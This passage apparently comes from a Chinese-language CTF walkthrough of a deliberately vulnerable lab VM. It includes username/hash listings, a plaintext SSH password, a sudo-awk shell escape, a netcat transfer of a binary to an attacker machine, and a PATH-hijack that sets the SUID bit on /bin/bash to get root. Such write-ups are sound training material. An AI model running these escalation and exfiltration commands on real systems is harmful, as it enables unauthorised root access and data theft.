d46df8e6a5627debf930f7b5c8f3b083    \npmccentral              c8c605999f3d8352d7bb792cf3fdb25b    \nFrederick               5f823f1ac7c9767c8d1efbf44158e0ea    \nSamuel                  4c6dda8a9d149332541e577b53e2a3ea    \nMary                    41ae0e6fbe90c08a63217fc964b12903    \nhecolivares             5d8cdc88039d5fc021880f9af4f7c5c3    <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148136.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148136.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318214155755\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>ssh\u767b\u5f55<\/h3>\n<pre><code class=\"language-apl\">pmccentral        999999999<\/code><\/pre>\n<pre><code class=\"language-bash\">ssh pmccentral@10.0.2.5<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148137.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148137.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318214315623\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h3>\n<pre><code class=\"language-bash\">pmccentral@laboratoryuser:~$ whoami;id\npmccentral\nuid=1001(pmccentral) gid=1001(pmccentral) groups=1001(pmccentral)\npmccentral@laboratoryuser:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/at\n\/usr\/bin\/chsh\n\/usr\/bin\/pkexec\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/snap\/core20\/1828\/usr\/bin\/chfn\n\/snap\/core20\/1828\/usr\/bin\/chsh\n\/snap\/core20\/1828\/usr\/bin\/gpasswd\n\/snap\/core20\/1828\/usr\/bin\/mount\n\/snap\/core20\/1828\/usr\/bin\/newgrp\n\/snap\/core20\/1828\/usr\/bin\/passwd\n\/snap\/core20\/1828\/usr\/bin\/su\n\/snap\/core20\/1828\/usr\/bin\/sudo\n\/snap\/core20\/1828\/usr\/bin\/umount\n\/snap\/core20\/1828\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1828\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\npmccentral@laboratoryuser:~$ sudo -l\n[sudo] password for pmccentral: \nSorry, try again.\n[sudo] password for pmccentral: \nMatching Defaults entries for pmccentral on laboratoryuser:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser pmccentral may run the following commands on 
laboratoryuser:\n    (laboratoryadmin) \/usr\/bin\/awk<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u63d0\u5347\u81f3laboratoryadmin<\/h3>\n<p><code>sudo -l<\/code> 显示 pmccentral 只能以 laboratoryadmin（而不是 root）的身份运行 <code>\/usr\/bin\/awk<\/code>。awk 的 <code>system()<\/code> 会以当前有效身份再起一个子 shell，所以这条 sudo 规则实际上等同于直接给了一个 laboratoryadmin 的 shell。利用https:\/\/gtfobins.github.io\/gtfobins\/awk\/\u7ed9\u51fa\u7684\u65b9\u6cd5\u63d0\u6743\u5230<code>laboratoryadmin<\/code>\u7528\u6237。防御侧的教训：凡是能执行外部命令的程序（awk、vi、less、find 等，GTFOBins 上都有列表）都不应该通过 sudo 委派给别人，否则就是变相给 shell。<\/p>\n<pre><code class=\"language-bash\">sudo -u laboratoryadmin awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;<\/code><\/pre>\n<p>\u7136\u540e\u641c\u5bfbflag（注意下面第一个 <code>ls -la<\/code> 列出的仍然是 pmccentral 的家目录——新 shell 只是换了身份，工作目录没有变）\uff1a<\/p>\n<pre><code class=\"language-text\">pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;\n$ whoami;id\nlaboratoryadmin\nuid=1002(laboratoryadmin) gid=1002(laboratoryadmin) groups=1002(laboratoryadmin)\n$ ls -la\ntotal 44\ndrwxr-xr-x 7 pmccentral pmccentral 4096 Dec 17 13:24 .\ndrwxr-xr-x 4 root       root       4096 Dec 17 15:34 ..\n-rw------- 1 pmccentral pmccentral  304 Dec 17 18:18 .bash_history\n-rw-r--r-- 1 pmccentral pmccentral  220 Dec 16 14:41 .bash_logout\n-rw-r--r-- 1 pmccentral pmccentral 3771 Dec 16 14:41 .bashrc\ndrwx------ 2 pmccentral pmccentral 4096 Dec 17 13:24 .cache\ndrwxrwxr-x 2 pmccentral pmccentral 4096 Dec 16 14:43 desktop\ndrwxrwxr-x 2 pmccentral pmccentral 4096 Dec 17 15:37 documents\ndrwxrwxr-x 2 pmccentral pmccentral 4096 Dec 16 14:43 downloads\ndrwxrwxr-x 3 pmccentral pmccentral 4096 Dec 16 14:42 .local\n-rw-r--r-- 1 pmccentral pmccentral  807 Dec 16 14:41 .profile\n$ cd \/home\n$ ls\nlaboratoryadmin  pmccentral\n$ cd laboratoryadmin\n$ ls -la\ntotal 52\ndrwx------ 8 laboratoryadmin laboratoryadmin 4096 Dec 18 16:15 .\ndrwxr-xr-x 4 root            root            4096 Dec 17 15:34 ..\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 18 20:16 autoScripts\n-rw------- 1 laboratoryadmin laboratoryadmin   74 Dec 18 20:17 .bash_history\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin  220 Dec 17 15:29 .bash_logout\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin 3771 Dec 17 15:29 .bashrc\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 
15:34 desktop\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 documents\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 downloads\ndrwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 home\ndrwxrwxr-x 3 laboratoryadmin laboratoryadmin 4096 Dec 17 15:30 .local\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin  807 Dec 17 15:29 .profile\n-rw-r--r-- 1 laboratoryadmin laboratoryadmin   33 Dec 18 16:15 user.txt\n$ cat user.txt\nflag{$udOeR$_Pr!V11E9E_I5_7En53}<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>换成 laboratoryadmin 身份后把 SUID 搜索再跑一遍：这次多出了 <code>\/home\/laboratoryadmin\/autoScripts\/PMCEmployees<\/code>。之前以 pmccentral 跑同一条 <code>find<\/code> 看不到它，是因为 laboratoryadmin 的家目录权限是 <code>drwx------<\/code>，其他用户根本进不去。每拿到一个新身份就重做一遍枚举，往往会有新发现。<\/p>\n<pre><code class=\"language-bash\">$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/at\n\/usr\/bin\/chsh\n\/usr\/bin\/pkexec\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/snap\/core20\/1828\/usr\/bin\/chfn\n\/snap\/core20\/1828\/usr\/bin\/chsh\n\/snap\/core20\/1828\/usr\/bin\/gpasswd\n\/snap\/core20\/1828\/usr\/bin\/mount\n\/snap\/core20\/1828\/usr\/bin\/newgrp\n\/snap\/core20\/1828\/usr\/bin\/passwd\n\/snap\/core20\/1828\/usr\/bin\/su\n\/snap\/core20\/1828\/usr\/bin\/sudo\n\/snap\/core20\/1828\/usr\/bin\/umount\n\/snap\/core20\/1828\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1828\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\n\/home\/laboratoryadmin\/autoScripts\/PMCEmployees\n$ cd \/home\/laboratoryadmin\/autoScripts\n$ file PMCEmployees\nPMCEmployees: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=2e8e1b3a3f1bba666df17c97871f88b0377343fb, for GNU\/Linux 3.2.0, not 
stripped<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5230\u672c\u5730\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">nc -lp 1234 &gt; head\nnc 10.0.2.4 1234 &lt; head\n\nnc -lp 1234 &gt; PMCEmployees\nnc 10.0.2.4 1234 &lt; PMCEmployees<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148138.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148138.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240319000541876\" \/><\/div><\/p>\n<pre><code class=\"language-bash\"># head\nbash -p<\/code><\/pre>\n<pre><code class=\"language-c\">\/\/ main\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __asm { endbr64 }\n  sub_1090(0LL, argv, envp);\n  sub_1080(&quot;Showing top 10 best employees of PMC company&quot;);\n  return sub_1070(&quot;head \/home\/pmccentral\/documents\/employees.txt&quot;);\n}<\/code><\/pre>\n<p>\u8fd9\u4e2a\u53cd\u7f16\u8bd1\u6211\u770b\u7684\u4e0d\u662f\u5f88\u61c2\uff0c\u7ee7\u7eed\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-c\">__int64 sub_1090()\n{\n  __asm { endbr64 }\n  return sub_1050();\n}<\/code><\/pre>\n<pre><code class=\"language-c\">void sub_1050()\n{\n  __asm { endbr64 }\n  sub_1020();\n}<\/code><\/pre>\n<pre><code class=\"language-c\">void sub_1020()\n{\n  
JUMPOUT(&amp;dword_0);\n}<\/code><\/pre>\n<p>\u8fd9\u6c47\u7f16\u597d\u50cf\u548c\u5e08\u5085\u4eec\u8bf4\u7684\u4e0d\u592a\u4e00\u6837\uff0c\u5207\u6362\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-c\">int32_t main (void) {\n    edi = 0;\n    eax = 0;\n    setuid ();\n    eax = 0;\n    printf (&quot;Showing top 10 best employees of PMC company&quot;);\n    rdi = &quot;head \/home\/pmccentral\/documents\/employees.txt&quot;;\n    eax = 0;\n    system ();\n    return eax;\n}<\/code><\/pre>\n<p>\u8fd9\u662fcutter\u7f16\u8bd1\u7684\uff0c\u548b\u602a\u602a\u7684\uff0c\u5207\u6362\u4e00\u4e2a\u53cd\u7f16\u8bd1\u5668\uff1a<\/p>\n<pre><code class=\"language-bash\">void main(void)\n{\n    setuid(0);\n    printf(&quot;Showing top 10 best employees of PMC company&quot;);\n    system(&quot;head \/home\/pmccentral\/documents\/employees.txt&quot;);\n    return;\n}<\/code><\/pre>\n<p>\u5bf9\u80c3\u4e86\uff01\u4f5c\u8005\u76f4\u63a5\u628ahead\u6454\u5728\u8138\u4e0a\u4e86\uff0c\u5c06\u5176\u6dfb\u52a0\u5230\u6700\u524d\u9762\u7684\u73af\u5883\u53d8\u91cf\u4e0a\u9762\uff0c\u8fd0\u884c\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n<pre><code>export PATH=\/home\/laboratoryadmin\/autoScripts:$PATH\n.\/PMCEmployees\nwhoami;id<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148139.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148139.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240319012752456\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f53\u7136\uff0c\u4e5f\u4e0d\u662f\u975e\u8981\u7528\u8fd9\u4e2a\u4f5c\u8005\u7684<code>head<\/code>\uff0c\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u81ea\u5df1\u5199\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/tmp;touch head;\necho &#039;chmod +s \/bin\/bash&#039; &gt; head\nchmod +x head\nexport PATH=&quot;$PWD:$PATH&quot;\nwhich head\n# \/tmp\/head\ncd \/home\/laboratoryadmin\/autoScripts\n.\/PMCEmployees<\/code><\/pre>\n<pre><code class=\"language-bash\">pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;\n[sudo] password for pmccentral: \n$ cd \/tmp;touch head;\n$ echo &quot;chmod +s \/bin\/bash&quot; &gt; head\n$ cat head\nchmod +s \/bin\/bash\n$ export $PATH= $PWD:$PATH\n\/bin\/sh: 4: export: \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin: bad variable name\n$ export PATH=&quot;$PWD:$PATH&quot;\n$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\n$ cd \/home\n$ ls\nlaboratoryadmin  pmccentral\n$ cd laboratoryadmin\/autoScripts\n$ ls\nhead  PMCEmployees\n$ .\/PMCEmployees\naren\nAarika\nAbagael\nAbagail\nAbbe\nAbbey\nAbbi\nAbbie\nAbby\nAbbye\nShowing top 10 best employees of PMC company$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n$ cd \/tmp\n$ ls\nhead\nsnap-private-tmp\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-apache2.service-qkdTjh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-ModemManager.service-KJJjTh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-logind.service-Ze1uNh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-resolved.service-SAAUQf\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-timesyncd.service-74TQVi\n$ rm head\n$ echo &#039;chmod +s \/bin\/bash&#039; &gt; head\n$ which head\n\/usr\/bin\/head\n$ echo 
$PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\n$ ls\nhead\nsnap-private-tmp\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-apache2.service-qkdTjh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-ModemManager.service-KJJjTh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-logind.service-Ze1uNh\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-resolved.service-SAAUQf\nsystemd-private-6b29ca23ee0c453c8ae1cc1a0276b925-systemd-timesyncd.service-74TQVi\n$ chmod +x head\n$ which head\n\/tmp\/head\n$ cd \/home\/laboratoryadmin\/autoScripts\n$ .\/PMCEmployees\nShowing top 10 best employees of PMC company$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n$ \/bin\/bash -p\nbash-5.0# whoami;id\nroot\nuid=1002(laboratoryadmin) gid=1002(laboratoryadmin) euid=0(root) egid=0(root) groups=0(root),1002(laboratoryadmin)\nbash-5.0# cat \/root\/root.txt\nflag{r00t_t3ns0}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>nebula \u6253\u4e0d\u5f00\uff0c\u6b63\u5e38\u7684\uff0c\u5148\u5bfc\u5165virtualbox\u518d\u8f6c\u62101.0\u683c\u5f0f\u7684\u5bfc\u51fa\u6765\uff0c\u6700\u540e\u4e22\u8fdbvmware\uff1a \u5b8c\u86cb 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,19,18],"tags":[],"class_list":["post-419","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-pwn","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/419","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=419"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/419\/revisions"}],"predecessor-version":[{"id":420,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/419\/revisions\/420"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=419"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=419"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=419"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}